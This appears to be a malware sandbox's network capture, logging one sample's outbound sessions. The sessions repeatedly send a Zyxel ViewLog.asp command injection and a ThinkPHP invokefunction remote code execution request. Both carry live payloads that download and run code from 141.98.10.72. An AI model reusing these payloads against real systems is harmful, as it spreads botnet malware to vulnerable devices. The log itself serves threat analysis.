                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            144192.168.2.233994894.123.85.588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:09.017014027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            145192.168.2.235156894.121.114.1798080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:09.017119884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            146192.168.2.233406894.121.96.708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:09.018198967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            147192.168.2.235469095.142.165.18180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.698748112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:10.890789986 CET458INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Server: Apache/2.2.16 (Debian)
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Content-Length: 181
                                                            Keep-Alive: timeout=15, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00
                                                            Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            148192.168.2.233303295.101.215.16980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.720736980 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:10.937371969 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 30 26 23 34 36 3b 31 37 63 34 35 62 34 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c5f2645f&#46;1707899290&#46;17c45b4c</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            149192.168.2.234488095.217.6.23880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.731021881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:10.958833933 CET78INHTTP/1.1 400 Bad Request
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            150192.168.2.233793695.217.180.12980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.741112947 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:10.977929115 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            151192.168.2.233972895.100.182.12980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.749931097 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:10.995770931 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 32 38 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 30 26 23 34 36 3b 62 35 62 62 66 36 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2e28f748&#46;1707899290&#46;b5bbf68</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            152192.168.2.235155295.0.232.4680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.755295992 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:19.026536942 CET51INHTTP/1.1 504 Gateway Timeout
                                                            Connection: close
                                                            Feb 14, 2024 09:28:19.230619907 CET51INHTTP/1.1 504 Gateway Timeout
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            153192.168.2.233571095.59.170.22180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:10.802264929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            154192.168.2.2346472112.173.228.22680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.083216906 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:11.364919901 CET506INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:28:10 GMT
                                                            Server: httpd
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            155192.168.2.2350640112.185.223.11980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.268358946 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:11.541649103 CET37INHTTP/1.1 404 Site or Page Not Found
                                                            Feb 14, 2024 09:28:11.541939974 CET294INData Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 32 34 3a 31 39 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                            Data Ascii: Server: DVRDVS-WebsDate: Wed Feb 14 17:24:19 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            156192.168.2.234523894.142.130.1148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.407270908 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:11.526242018 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/6.0.0-20220501-re899e0c27
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:28:11 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3572
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            Cache-Status: ezproxies.com
                                                            Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            157192.168.2.2356774112.95.139.15280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.460050106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:11.839870930 CET490INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 148
                                                            Connection: close
                                                            Proxy-Status: 0000201400001016
                                                            x-tt-trace-host: 0148e6796058ab036ad4c384bf703a817b7d19209bd54f468a19336dc3169576d4de5b29c80f5b9f98dea10b2261e7ca7c
                                                            x-tt-trace-tag: id=00;cdn-cache=miss
                                                            Server: TLB
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 54 4c 42 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>TLB</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            158192.168.2.235209631.136.74.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.490449905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.129703045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:13.377526999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:16.065251112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
